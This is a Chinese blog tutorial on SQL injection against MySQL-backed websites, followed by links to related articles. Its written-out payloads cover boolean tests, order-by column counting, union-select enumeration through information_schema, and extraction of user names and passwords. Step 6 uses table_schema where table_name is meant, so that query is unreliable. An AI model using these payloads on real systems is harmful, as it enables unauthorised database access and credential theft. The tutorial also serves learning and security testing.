web安全之简要sql注入

最新推荐文章于 2024-09-06 13:45:00 发布
最新推荐文章于 2024-09-06 13:45:00 发布
阅读量1k 收藏 10
点赞数 7
文章标签: web安全 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73185660/article/details/140810866
版权

SQL注入原理:可控变量,带入数据库查询,变量中未存在过滤或者过滤不严谨

如何判断注入点?(以下数据库类型为mysql)

老办法:

and 1=1 页面正常

and 1=2 页面错误

可能存在注入点

但是要选用最舒服的方法去测试!

讲一下老方法的原理

select * from users where id=1 and 1=1,正常

select * from users where id=1 and 1=2,错误

前面都是正确的语句,区别在于后面。

如果是1=1,那么就是真且真,结果为真

如果是1=2,那么就是真且假,结果为假

就是说你所自定义的1=1或者1=2,被网站正常执行到了,所以就存在注入点

那么我们就可以自定义一些sql语句,获取数据库的数据,写sql语句可以用到联合查询UNION这个关键字

操作流程如下:
1.判断注入

2.猜测列名数量(字段数),一般用order by去猜

        select * from users where id=1 order by (1~n),直到页面不正常即为字段数,比如4正常,5不正常,则字段数为4。

 3.猜解准备

         select * from users where id=-1 union select 1,2,3,4,正常

        注意:id=-1,让前面的语句为错误语句,即可只执行后面的语句,这样的作用是看下哪几列数据可以显示出来,然后将能显示的替换成注入语句即可

4.信息收集

数据库版本:version()

数据库名称:database()

数据库用户:user()

操作系统:@@version_compile_o s

比如说正常显示2和3,那就可以写

 select * from users where id=-1 union select 1,database(),version(),4

5.查询指定数据库名下的表名信息

如果是mysql5.0以上,则存在information_schema,其中存储所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表名或列名信息。

 information_schema.tables:记录所有表名信息的表

information_schema.columns:记录所有列名信息的表

table_name:表名

column_name:列名

table_schema:数据库名

举例:select * from users where id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='这里写数据库名称'

group_concat()是把多行结果并作一行显示 

6.查询指定表名下的列名信息

select * from users where id=-1 union select 1,column_name,3,4 from information_schema.columns where table_schema='这里写表名'

7.查询指定数据

 select * from users where id=-1 union select 1,name,password,4 from 表名

怀后同学.
关注
  • 7
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
小迪安全第12天 web漏洞,SQL注入简要SQL注入
qq_46116117的博客
12-02 1648
12 web漏洞,SQL注入简要SQL注入 前言: ​ 在本系列课程学习中,SQL 注入漏洞将是重点部分,其中 SQL 注入 又非常复杂,区分各种数据库类型,提交方法,数据类型等注入,我们需 要按部就班的学习,才能学会相关 SQL 注入的核心。同样此类漏洞是 WEB 安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的 SQL注入中需要学习到的知识点 (右边比较容易理解,左边比较困难) SQL注入安全测试中的危害 1.SQL注入能够操控数据库里面的数据 2.可以直接进行后门的写入,直接getsh
WEB漏洞—SQL注入简要SQL注入
qq_61861243的博客
04-12 858
SQL直接去对数据库中的数据进行操作(查询,更新,删除)SQL注入不同注入点是有条件的(权限)
WEB漏洞-SQL注入简要SQL注入
SXXYNHHXX的博客
08-18 837
SQL注入漏洞是是重点部分,其中SQL注入又非常复杂,区分各种数据库类型,提交方法,数据类型等注入,我们需要按部就班的学习,才能学会相关SQL注入的核心。同样此类漏洞是WEB安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。
WEB漏洞——SQL注入简要SQL注入
qq_52589245的博客
10-06 3003
前言 sql注入是比较常见的网络攻击方式之一, 他不是利用操作系统的bug来实现攻击,而是针对程序员编写时的疏忽,通过sql语句,实现无账号登录,甚至篡改数据库。 sql简介 sql是一门ANSI的标准计算机语言, 用来访问和操作书序库系统。 sql语句用于取回和更新数据库中的数据。sql可与数据库程序协同工作,比如MS Access, DB2 , informinx, mssql Server,Oracle, Sybase 以及其他数据库系统。 sql注入 ...
网络安全笔记--简要SQL注入
swy66的博客
07-29 665
简单SQLZ注入
web安全-SQL注入的类型以及提交注入
weixin_73185660的博客
08-07 478
GET只要网址后面带有参数就能接收到参数,不一定非要使用GET方法传递参数,使用POST方法传参,地址后有参数,GET一样能接收。如果不加引号,在访问时他会自动给你加上引号或者(),又或者是{},让你的注入语句比如and 1=1变成字符串的一部分,所以需要在注入的时候需要做闭合。那么放到sql语句中就是select * from users where id = '1' and '1' = '1' limit 0,1。作用:可以判断网站使用的请求方法,从而绕过waf的防护。数字,字符,搜索,JSON等。
第12篇:WEB漏洞~SQL注入~简要SQL注入
廖一语山的博客
09-24 1586
目录前言正文 前言   在本系列课程学习中,SQL注入漏洞将是重点部分,其中SQL注入又非常复杂,区分各种数据库类型,提交方法,数据类型等注入,我们需要按部就班的学习,才能学会相关SQL注入的核心。同样此类漏洞是WEB安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。 学习顺序:从右往左、从上往下 正文 忍者安全测试系统使用说明 #上述思维导图简要说明 #SQL注入安全测试中的危害 #SQL注入产生原理详细分析 可控变量,带入数据库查询,变量未存在过滤或过滤不严重 #搭建第一个SQL注入学习
简要了解web安全sql注入
ananpanke72830的博客
11-26 116
什么是sql注入? 通俗来讲就是通过 将可执行sql语句作为参数 传入查询sql 中,在sql编译过程中 执行了传入进来的恶意 sql,从而 得到 不应该查到或者不应该执行的sql语句,对网站安全,信息 造成了威胁。 简单sql注入的几种情况 1.第一种情况:闭合 where条件 的语句来进行 查询 不属于自己 的内容 select * from accoun...
SQL注入攻击介绍
热门推荐
99度灰的博客
03-30 3万+
SQL注入攻击介绍 一、SQL注入攻击简介 SQL注入攻击是指,后台数据库操作时,如果拼接外部参数到SQL语句中,就可能导致欺骗服务器执行恶意的SQL语句,造成数据泄露、删库、页面篡改等严重后果。按变量类型分为:数字型、字符型;按HTTP提交方式分为:GET注入、POST注入、Cookie注入;按注入方式分为:报错注入、盲注(布尔盲注、时间盲注)、堆叠注入等等。 二、SQL注入分类 按变量类型分类:如SQL语句为select *from user where param=1(数字型)、select *fr
《小迪网络安全笔记》 第十二节:WEB漏洞-SQL注入简要SQL注入
小陈的博客
08-20 4807
前言 在本系列课程学习中,SQL注入漏洞将是重点部分,其中SQL注入又非常复杂,区分各种数据库类型,提交方法,数据类型等注入,我们需要按部就班的学习,才能学会相关SQL注入的核心。同样此类漏洞是WEB安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。 注:左边的比右边的难,学习顺序为从右向左。 一、忍者安全测试系统使用说明 二、上述思维导图简要说明 操作系统:windows和linux对大小写敏感不同,如果查了操作系统可以避免这个问题。 数据库名:如果不知道数据库名查询的时候会有问题。
B站小迪安全笔记第12天-SQL注入简要注入
m0_61530426的博客
07-20 678
B站小迪安全笔记
【小迪安全学习笔记】WEB漏洞-SQL注入简要SQL注入
Akrios的博客
05-24 1079
在本系列课程学习中,SQL注入漏洞是将是重点部分,其中SQL注入又非常复杂,区分各种数据库类型,提交方法,数据类型等注入,我们需要按部就班的学习,才能学会相关SQL注入的核心。同样此类漏洞是WEB安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。 SQL注入安全测试中危害 分为两类:危害数据库里的数据、直接危害到网站的权限(需要满足条件) SQL注入产生原理详细分析 见案例 SQL语句在定义的时候没有变量,就不能进行SQL注入 可控变量,带入数据库查询,变量为存在过滤或过滤不严谨 可能存在注入的
【小迪安全day12】WEB 漏洞——SQL 注入
RichUee的博客
12-04 914
WEB 漏洞-SQL 注入在本系列课程学习中,SQL 注入漏洞将是重点部分,其中 SQL 注入又非常复杂,区分各种数据库类型,提交方法,数据类型等注入,我们需要按部就班的学习,才能学会相关 SQL 注入的核心。同样此类漏洞是WEB 安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
最新发布
2401_84466224的博客
09-06 1597
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
什么是网络安全
网络研究观
09-04 2627
了解不同类型的网络安全和主要形式的网络威胁。
【网络安全】漏洞挖掘
anquan2233的博客
08-29 1721
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
入门网络安全工程师要学习哪些内容
白帽子佳奇的博客
09-05 1286
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
【学术会议征稿】第二届人工智能、系统与网络安全国际学术会议 (AISNS 2024)
XIAOAIXUEJIE的博客
09-05 771
(人工智能算法、自然语言处理、模糊逻辑、计算机视觉与图像理解、信号和图像处理、语音与自然语言处理、计算学习理论、信息检索与融合、混合智能系统、智能系统架构、知识表示、基于知识的系统、机电一体化、多媒体与认知信息学、人工神经网络并行处理、模式识别、普适计算与环境智能、软计算理论与应用、软硬件架构、自动编程、机器学习、自动控制、数据挖掘与机器学习工具、机器人学、人工智能工具与应用、最近的趋势和发展等)(操作系统、分布式系统、数据库系统、网络系统、编译系统、计算机体系结构、虚拟化技术、容器技术)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怀后同学.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值